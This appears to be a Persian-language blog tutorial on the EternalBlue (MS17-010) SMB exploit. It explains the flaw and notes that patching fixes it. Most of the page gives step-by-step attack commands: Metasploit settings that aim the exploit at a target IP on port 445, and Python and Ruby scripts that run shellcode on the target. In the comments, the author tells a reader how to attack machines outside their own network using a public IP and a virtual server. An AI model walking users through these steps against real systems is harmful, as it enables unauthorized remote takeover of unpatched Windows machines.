اموزش اکسپلویت Eternalblue

اکسپلویت Eternalblue

اکسپلویت Eternalblue اموزش قدم به قدم و معرفی چندین ابزار حرفه ای برای استفاده از این اسیب پذیری
ابزار چک و تست اسیب پذیر بودن MS17-010 Eternalblue اموزش تصویری
اموزش کلی از اسیب پذیری اکسپلویت Eternalblue و توضیحات معرفی ان برای تمامی سیستم عامل ها

اموزش ابزار اکسپلویت Eternalblue 

MS17-010

اموزش اکسپلویت Eternalblue چیست ؟

اکسپلویت نسبتا جدیدی که توسط هکر هایی  از سیستم های سازمان NSA دزدیده شد
این اکسپلویت با استفاده از اسیب پذیری سرویس SMB  ویندوز عمل میکند و باعث اجرای کد از راه دور میشود
سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند 
و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند
 

چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟

امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است
و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان
 

چه سیستم عامل هایی را شامل میشود ؟

  • Windows XP 
  • Windows 2000
  • Windows 2003 R2 
  • Windows 2008 R2
  • Windows 2012 R2 
  • Windows 7 SP1 
  • Windows 8.1
  • Windows 2016
  • Windows 10  

 

سطح دسترسی

با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید
راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید
 

نکته

از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد 
 

نصب 

یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است
در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر 

msfupdate

اجرای اکسپلویت در متااکسپلویت
اجرای متا

msfconsole

انتخاب اکسپلویت

use address/smb/smb_ms17_010

نمایش اطلاعات ست شده

options 

ست کردن ایپی سیستم

set rhosts ip_server

ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است

set rport 445

اجرا یا run

exploit

اموزش اکسپلویت Eternalblue
(همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.)

 

اجرای اکسپلویت با ابزار 

ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف
دانلود ابزار با استفاده از دستور زیر

git clone link 

اموزش اکسپلویت Eternalblue
چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم

 python checker.py ip_server

اموزش اکسپلویت Eternalblue
اجرای شل کد بر روی سیستم با استفاده از اکسپلویت

python exploit.py ip_server shellcode

 
 
معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب
اجرا با دستور زیر

ruby eternalblue_doublepulsar.rb

 
نکته : در استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد.

 

فایل های ابزار اکسپلویت Eternalblue :



[ برای درافت فایل وارد شوید و یا ثبت نام کنید! ]

 

1.5/5 (2 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های امنیت شبکه و راه های مقابله با نفوذ ، در 7 سال گذشته متمرکز بر مباحث روز امنیت سایبری بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

۹ دیدگاه در “اموزش اکسپلویت Eternalblue”

  • Ahmadshah آذر 10, 1398 پاسخ

    سلام استاد عزیز
    استاد یه سوال ازتون داشتم : بعد از اینکه اکسپلویت را اجرا کردیم چطور ویندوز مقابل راکنترل کنیم شما گفتین همراه شل ها و یا meterpreter ولی چگونه ! اگه امکانش بود یک ویدیو در این مورد نشر می کردین خوب بود باز هم از این آموزش طلائی تان متشکر هستم ممنون از بابت تلاش هایتان. بدرود

    • Nima Nani آذر 15, 1398 پاسخ

      درود بر شما
      برای مشاهده راهنما از دستور help استفاده کنید تمامی امکانات برای کنترل سیستم را مشاهده خواهید کرد.
      موفق باشید.

  • ALI دی 3, 1399 پاسخ

    سلام استاد خسته نباشید ببخشید در قسمت آی پی اینگونه اکسپلویت ها باید آی پی پابلیک رو بدیم یا آی پی خصوصی شبکه داخلیمون ؟
    البته میخام خارج از شبکه استفاده کنم و از راه دور دسترسی بگیرم
    و اینکه باید یه سرور راه اندازی کنم واسه این کار ؟؟

    • پن‌تست‌کور دی 5, 1399 پاسخ

      درود و تشکر
      باید برای خارج از شبکه ای پی پابلیک داشته باشید.
      می توانید یک سرور مجازی برای اینکار تهیه کنید.

  • سعید بهمن 12, 1399 پاسخ

    سلام خسته نباشید
    میخواستم بدونم میشه اکسپلوییت اسیب پذیری stagefrightبرای اندروید۴درتبلت asusنوشت¿

    • پن‌تست‌کور اسفند 13, 1399 پاسخ

      درود و تشکر
      بله ممکن است.

  • محمد ب مهر 24, 1400 پاسخ

    ممنون عالی بود.
    به نوعی دسترسی ریموت بهمون میده؟

  • سعید بهمن 18, 1400 پاسخ

    سلام من هیچی نمیدونم ازاین نرم افزارها ولی میخوام یادبگیرم چکار باید کرد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
دوره کالی لینوکس
نماد های اعتماد
نماد های اعتماد